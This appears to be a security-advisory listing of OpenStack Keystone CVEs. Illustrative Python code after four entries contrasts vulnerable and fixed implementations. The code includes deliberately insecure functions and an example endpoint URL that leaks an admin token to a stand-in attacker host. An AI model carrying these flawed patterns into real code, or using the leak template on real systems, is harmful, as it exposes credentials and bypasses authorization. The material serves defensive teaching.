Keystone

by OpenStack

pypi: keystone

CVEs (41)

  • CVE-2025-65073 (High) · Nov 17, 2025
    risk 0.49 · CVSS 7.5 · EPSS 0.00

    OpenStack Keystone before 26.0.1, 27.0.0, and 28.0.0 allows a /v3/ec2tokens or /v3/s3tokens request with a valid AWS Signature to provide Keystone authorization.

  • CVE-2026-43001 (High) · May 1, 2026
    risk 0.44 · CVSS 7.9 · EPSS 0.00

    An issue was discovered in OpenStack Keystone before 29.0.2. POST /v3/credentials did not validate that the caller-supplied project_id for an EC2-type credential matched the project of the authenticating application credential. This allowed an attacker holding an unrestricted…

  • CVE-2026-40683 (High) · Apr 14, 2026
    risk 0.43 · CVSS 7.7 · EPSS 0.00

    In OpenStack Keystone before 28.0.1, the LDAP identity backend does not convert the user enabled attribute to a boolean when the user_enabled_invert configuration option is False (the default). The _ldap_res_to_model method in the UserApi class only performed string-to-boolean…
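
    The failure mode in that entry is the classic truthy-string bug: LDAP hands attribute values back as strings (or bytes), and a string such as "FALSE" is truthy in Python unless it is explicitly converted. The block below is an added stand-in written for this page, not Keystone's own code; the helper names, the constructed LDAP entry and the two conversion paths are assumptions that reproduce the described behaviour in miniature.

```python
"""Illustrative reconstruction (not Keystone's code) of the LDAP 'enabled'
attribute handling described for CVE-2026-40683."""

TRUE_STRINGS = ("true", "1", "yes", "on")
FALSE_STRINGS = ("false", "0", "no", "off")


def _to_bool(value):
    """Strict conversion of an LDAP attribute value to bool.

    python-ldap returns attribute values as bytes; other backends hand back
    str. Anything not recognisably true/false is rejected, not guessed.
    """
    if isinstance(value, bool):
        return value
    if isinstance(value, bytes):
        value = value.decode("utf-8", "replace")
    text = str(value).strip().lower()
    if text in TRUE_STRINGS:
        return True
    if text in FALSE_STRINGS:
        return False
    raise ValueError("unrecognised boolean attribute value: %r" % (value,))


def vulnerable_enabled(ldap_value, user_enabled_invert=False):
    """Pattern the advisory describes: conversion happens only on the invert
    branch, so in the default configuration the raw string comes back."""
    if user_enabled_invert:
        return not _to_bool(ldap_value)
    return ldap_value  # BUG: "FALSE" is a non-empty string and therefore truthy


def fixed_enabled(ldap_value, user_enabled_invert=False):
    """Always normalise to bool first, then apply the invert option."""
    enabled = _to_bool(ldap_value)
    return (not enabled) if user_enabled_invert else enabled


def may_authenticate(user):
    """The check an auth path performs on the model it was handed."""
    return bool(user["enabled"])


def demo():
    # Constructed LDAP result for a disabled account, default config (no invert).
    ldap_entry = {"uid": [b"alice"], "enabled": [b"FALSE"]}
    raw = ldap_entry["enabled"][0]
    vuln_user = {"name": "alice", "enabled": vulnerable_enabled(raw)}
    fixed_user = {"name": "alice", "enabled": fixed_enabled(raw)}
    return may_authenticate(vuln_user), may_authenticate(fixed_user)


if __name__ == "__main__":
    vuln, fixed = demo()
    print("vulnerable path lets the disabled user in:", vuln)
    print("fixed path lets the disabled user in:", fixed)
```

    The stand-in ignores Keystone's related [ldap] options user_enabled_mask and user_enabled_default, which also feed into the enabled flag. After patching, the operational check is to pick an LDAP account whose enabled attribute is set to the false value and confirm that a password authentication for it is refused.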

  • CVE-2015-7546 (High) · Feb 3, 2016
    risk 0.42 · CVSS 7.5 · EPSS 0.02

    The identity service in OpenStack Identity (Keystone) before 2015.1.3 (Kilo) and 8.0.x before 8.0.2 (Liberty) and keystonemiddleware (formerly python-keystoneclient) before 1.5.4 (Kilo) and Liberty before 2.3.3 does not properly invalidate authorization tokens when using the PKI…

  • CVE-2013-0270 (Medium) · Apr 12, 2013
    risk 0.35 · CVSS 6.5 · EPSS 0.03

    A flaw was found in OpenStack Keystone. A remote attacker could exploit this vulnerability by sending a large HTTP request, specifically by providing a long tenant name when requesting a token. This could lead to a denial of service, consuming excessive CPU and memory resources…

  • CVE-2026-44394 (Medium) · May 28, 2026
    risk 0.32 · CVSS 6.0 · EPSS 0.00

    An issue was discovered in OpenStack Keystone before 29.0.2. The Keystone federated token rescoping mechanism does not propagate the original token's expiry to the newly issued token. When a federated user rescopes a token via POST /v3/auth/tokens, the handle_scoped_token()…

  • CVE-2026-43000 (Medium) · May 28, 2026
    risk 0.32 · CVSS 6.0 · EPSS 0.00

    An issue was discovered in OpenStack Keystone before 29.0.2. When combined with an application credential impersonation vulnerability, an attacker with the member role on a project can escalate to admin by chaining unrestricted application credentials with Keystone trusts. The…

  • CVE-2026-42999 (Medium) · May 28, 2026
    risk 0.32 · CVSS 6.0 · EPSS 0.00

    An issue was discovered in OpenStack Keystone before 29.0.2. The Keystone RBAC policy enforcer in enforce_call unconditionally merges the raw JSON request body into the policy enforcement dictionary via policy_dict.update(json_input.copy()), overwriting trusted target data that…
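
    The pattern in that entry is a trusted/untrusted namespace collision: the dictionary a policy rule evaluates holds server-resolved facts about the target object, and a body key with the same name silently replaces one of them. The block below is an added stand-in written for this page, not Keystone's or oslo.policy's code; the rule, the key names and the stored credential are constructed.

```python
"""Stand-in (not Keystone's or oslo.policy's code) for the enforcement pattern
described for CVE-2026-42999: merging the raw request body into the dictionary a
policy rule reads lets the caller overwrite target data the server resolved."""


def rule_owner_only(policy_dict):
    """Simplified rule: the credential being modified must belong to the caller.

    Plays the role of something like
    "identity:update_credential": "user_id:%(target.credential.user_id)s".
    """
    return policy_dict["user_id"] == policy_dict["target.credential.user_id"]


def resolve_target(stored_credential):
    """Trusted target attributes, loaded server-side from the stored object."""
    return {
        "target.credential.user_id": stored_credential["user_id"],
        "target.credential.project_id": stored_credential["project_id"],
    }


def _base_dict(caller, stored_credential):
    policy_dict = {"user_id": caller["user_id"], "project_id": caller["project_id"]}
    policy_dict.update(resolve_target(stored_credential))
    return policy_dict


def vulnerable_enforce(caller, stored_credential, json_input):
    policy_dict = _base_dict(caller, stored_credential)
    # BUG: body keys land in the same namespace as the trusted data and win.
    policy_dict.update(json_input.copy())
    return rule_owner_only(policy_dict)


def fixed_enforce(caller, stored_credential, json_input):
    policy_dict = _base_dict(caller, stored_credential)
    # Body attributes are exposed to rules under their own prefix, so they can
    # never shadow the caller's identity or the resolved target.
    for key, value in json_input.items():
        policy_dict["input." + key] = value
    return rule_owner_only(policy_dict)


# Constructed data: a credential owned by alice and a caller, bob, in another project.
STORED = {"id": "cred-1", "user_id": "alice", "project_id": "proj-a"}
BOB = {"user_id": "bob", "project_id": "proj-b"}
ALICE = {"user_id": "alice", "project_id": "proj-a"}


def demo():
    # bob's body claims the target belongs to him.
    body = {"blob": "rotated", "target.credential.user_id": "bob"}
    return vulnerable_enforce(BOB, STORED, body), fixed_enforce(BOB, STORED, body)


if __name__ == "__main__":
    vuln, fixed = demo()
    print("vulnerable enforcer lets bob update alice's credential:", vuln)
    print("fixed enforcer lets bob update alice's credential:", fixed)
```

    A useful regression check against any enforcer of this shape is to submit a body whose keys mirror every target.* and credential key the rule can reference and confirm the decision is identical to the same request with an empty body.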

  • CVE-2026-42998 (Medium) · May 28, 2026
    risk 0.32 · CVSS 6.0 · EPSS 0.00

    An issue was discovered in OpenStack Keystone before 29.0.2. The Keystone application credential authentication plugin does not verify that the user supplied in the authentication request matches the owner of the application credential. An attacker can authenticate with their…

  • CVE-2018-14432 (Medium) · Jul 31, 2018
    risk 0.28 · CVSS 5.3 · EPSS 0.02

    In the Federation component of OpenStack Keystone before 11.0.4, 12.0.0, and 13.0.0, an authenticated "GET /v3/OS-FEDERATION/projects" request may bypass intended access restrictions on listing projects. An authenticated user may discover projects they have no authority to…

  • CVE-2026-33551 (Low) · Apr 10, 2026
    risk 0.16 · CVSS 3.5 · EPSS 0.00

    An issue was discovered in OpenStack Keystone 14 through 26 before 26.1.1, 27.0.0, 28.0.0, and 29.0.0. Restricted application credentials can create EC2 credentials. By using a restricted application credential to call the EC2 credential creation API, an authenticated user with…
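
    Three of the application-credential entries above (CVE-2026-42998, CVE-2026-43001 and this one) come down to checks that an authentication or credential-creation path must make against the application credential itself rather than against what the request claims: the supplied user must be the credential's owner, a credential created under an application-credential token must stay in that token's project, and a restricted application credential may not mint further credentials. The block below is an added illustration written for this page, not Keystone's code; the users, projects, secrets, in-memory store and handler names are constructed.

```python
"""Illustration (not Keystone's code) of the application-credential checks
described for CVE-2026-42998, CVE-2026-43001 and CVE-2026-33551."""

import hmac
from dataclasses import dataclass
from typing import Optional


class AuthError(Exception):
    pass


@dataclass(frozen=True)
class AppCredential:
    id: str
    user_id: str
    project_id: str
    secret: str
    unrestricted: bool = False


@dataclass(frozen=True)
class Token:
    user_id: str
    project_id: str
    app_cred_id: Optional[str] = None  # None for password-based tokens
    unrestricted: bool = True          # copied from the application credential when used


# Constructed store: alice holds a restricted credential, bob an unrestricted one.
APP_CREDS = {
    "ac-alice": AppCredential("ac-alice", "alice", "proj-a", "s3cret-a", unrestricted=False),
    "ac-bob": AppCredential("ac-bob", "bob", "proj-b", "s3cret-b", unrestricted=True),
}
CREDENTIALS = []  # constructed credential table written by create_ec2_credential


def _lookup(app_cred_id, secret):
    cred = APP_CREDS.get(app_cred_id)
    if cred is None or not hmac.compare_digest(cred.secret, secret):
        raise AuthError("invalid application credential")
    return cred


def vulnerable_authenticate(app_cred_id, secret, user_id):
    """Pattern from CVE-2026-42998: the secret is verified, the user is not."""
    cred = _lookup(app_cred_id, secret)
    # BUG: the caller-supplied user_id goes into the token without being
    # compared with cred.user_id, so the token speaks for whoever was named.
    return Token(user_id, cred.project_id, cred.id, cred.unrestricted)


def fixed_authenticate(app_cred_id, secret, user_id=None):
    cred = _lookup(app_cred_id, secret)
    # The credential, not the request, decides whose token this is.
    if user_id is not None and user_id != cred.user_id:
        raise AuthError("application credential does not belong to that user")
    return Token(cred.user_id, cred.project_id, cred.id, cred.unrestricted)


def create_ec2_credential(token, project_id, blob):
    """Hardened handler for POST /v3/credentials with type "ec2"."""
    if token.app_cred_id is not None:
        # CVE-2026-33551: a restricted application credential may not create credentials.
        if not token.unrestricted:
            raise AuthError("restricted application credential may not create credentials")
        # CVE-2026-43001: the new credential must belong to the token's own project.
        if project_id != token.project_id:
            raise AuthError("project_id does not match the application credential's project")
    record = {"type": "ec2", "user_id": token.user_id, "project_id": project_id, "blob": blob}
    CREDENTIALS.append(record)
    return record


def outcome(fn, *args, **kwargs):
    """Collapse a call into 'accepted' or 'rejected' so the paths can be compared."""
    try:
        fn(*args, **kwargs)
        return "accepted"
    except AuthError:
        return "rejected"


def demo():
    # alice presents her own credential but names bob as the user.
    impersonated = vulnerable_authenticate("ac-alice", "s3cret-a", user_id="bob").user_id
    bob = fixed_authenticate("ac-bob", "s3cret-b")
    alice = fixed_authenticate("ac-alice", "s3cret-a")
    return {
        "vulnerable_token_user": impersonated,
        "fixed_owner_check": outcome(fixed_authenticate, "ac-alice", "s3cret-a", user_id="bob"),
        "unrestricted_same_project": outcome(create_ec2_credential, bob, "proj-b", {}),
        "unrestricted_other_project": outcome(create_ec2_credential, bob, "proj-a", {}),
        "restricted_create": outcome(create_ec2_credential, alice, "proj-a", {}),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print("%-28s %s" % (name, result))
```

    The deployment-side check for the first of these is simple: authenticate with your own application credential while naming a different user in the request body, and confirm the token you receive (or the 401 you get instead) is for the credential's owner.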

  • CVE-2021-3563 · Aug 26, 2022
    risk 0.00 · CVSS n/a · EPSS 0.01

    A flaw was found in openstack-keystone. Only the first 72 characters of an application secret are verified allowing attackers bypass some password complexity which administrators may be counting on. The highest threat from this vulnerability is to data confidentiality and…

  • CVE-2012-1572 · Nov 12, 2019
    risk 0.00 · CVSS n/a · EPSS 0.01

    OpenStack Keystone: extremely long passwords can crash Keystone by exhausting stack space

  • CVE-2013-2255 · Nov 1, 2019
    risk 0.00 · CVSS n/a · EPSS 0.01

    HTTPSConnections in OpenStack Keystone 2013, OpenStack Compute 2013.1, and possibly other OpenStack components, fail to validate server-side SSL certificates.

  • CVE-2018-20170 · Dec 17, 2018
    risk 0.00 · CVSS n/a · EPSS 0.01

    OpenStack Keystone through 14.0.1 has a user enumeration vulnerability because invalid usernames have much faster responses than valid ones for a POST /v3/auth/tokens request. NOTE: the vendor's position is that this is a hardening opportunity, and not necessarily an issue that…

  • CVE-2015-3646 · May 12, 2015
    risk 0.00 · CVSS n/a · EPSS 0.03

    OpenStack Identity (Keystone) before 2014.1.5 and 2014.2.x before 2014.2.4 logs the backend_argument configuration option content, which allows remote authenticated users to obtain passwords and other sensitive backend information by reading the Keystone logs.

  • CVE-2014-0204 · Nov 3, 2014
    risk 0.00 · CVSS n/a · EPSS 0.01

    OpenStack Identity (Keystone) before 2014.1.1 does not properly handle when a role is assigned to a group that has the same ID as a user, which allows remote authenticated users to gain privileges that are assigned to a group with the same ID.

  • CVE-2014-3520 · Oct 26, 2014
    risk 0.00 · CVSS n/a · EPSS 0.02

    OpenStack Identity (Keystone) before 2013.2.4, 2014.x before 2014.1.2, and Juno before Juno-2 allows remote authenticated trustees to gain access to an unauthorized project for which the trustor has certain roles via the project ID in a V2 API trust token request.

  • CVE-2014-3621 · Oct 2, 2014
    risk 0.00 · CVSS n/a · EPSS 0.02

    The catalog url replacement in OpenStack Identity (Keystone) before 2013.2.3 and 2014.1 before 2014.1.2.1 allows remote authenticated users to read sensitive configuration options via a crafted endpoint, as demonstrated by "$(admin_token)" in the publicurl endpoint field.
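
    The lesson in that entry is about template substitution: if every "$(name)" in an endpoint URL is resolved against the whole service configuration, the set of readable settings is bounded only by what the template author can name. The block below is an added example written for this page, not Keystone's catalog code; the configuration values, the allowlist, the URLs and the function names are constructed.

```python
"""Example (not Keystone's code) of the endpoint-template problem described for
CVE-2014-3621: unrestricted "$(name)" substitution versus an allowlist."""

import re

_PLACEHOLDER = re.compile(r"\$\((\w+)\)")

# Constructed configuration: the kind of values a keystone.conf holds.
CONFIG = {
    "admin_token": "ADMIN-TOKEN-DO-NOT-LEAK",
    "public_port": "5000",
    "admin_port": "35357",
}

# The only names an endpoint template may reference.
ALLOWED = {"tenant_id", "user_id", "project_id", "public_port", "admin_port"}


class EndpointFormatError(ValueError):
    pass


def vulnerable_format_url(url, request_values):
    """Placeholders resolve against the request values and then *all* of CONFIG."""
    lookup = dict(CONFIG)
    lookup.update(request_values)
    return _PLACEHOLDER.sub(lambda m: str(lookup[m.group(1)]), url)


def fixed_format_url(url, request_values):
    """Only allowlisted names resolve; anything else fails the endpoint closed.

    Failing loudly is deliberate: leaving an unresolved "$(x)" in the URL would
    hide a bad catalog entry from the operator.
    """
    lookup = {k: v for k, v in CONFIG.items() if k in ALLOWED}
    lookup.update({k: v for k, v in request_values.items() if k in ALLOWED})

    def _resolve(match):
        name = match.group(1)
        if name not in ALLOWED:
            raise EndpointFormatError("placeholder %r is not permitted in endpoint URLs" % name)
        if name not in lookup:
            raise EndpointFormatError("no value for placeholder %r in this request" % name)
        return str(lookup[name])

    return _PLACEHOLDER.sub(_resolve, url)


# Constructed catalog entries: one legitimate template, one written to exfiltrate a setting.
LEGIT_URL = "http://identity.example.test:$(public_port)/v2.0/$(tenant_id)"
MALICIOUS_URL = "http://attacker.example.test/?leak=$(admin_token)"


def demo():
    request = {"tenant_id": "t-123"}
    leaked = vulnerable_format_url(MALICIOUS_URL, request)
    try:
        fixed_format_url(MALICIOUS_URL, request)
        hardened = "formatted"
    except EndpointFormatError:
        hardened = "rejected"
    return leaked, hardened, fixed_format_url(LEGIT_URL, request)


if __name__ == "__main__":
    leaked, hardened, legit = demo()
    print("vulnerable formatter:", leaked)
    print("fixed formatter on the malicious URL:", hardened)
    print("fixed formatter on the legitimate URL:", legit)
```

    The same allowlist discipline applies to any templating layer that has both per-request data and a process-wide configuration in scope; the namespace the template may reach into should be an explicit set, never "whatever the formatter can see".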

  • CVE-2014-5253 · Aug 25, 2014
    risk 0.00 · CVSS n/a · EPSS 0.01

    OpenStack Identity (Keystone) 2014.1.x before 2014.1.2.1 and Juno before Juno-3 does not properly revoke tokens when a domain is invalidated, which allows remote authenticated users to retain access via a domain-scoped token for that domain.
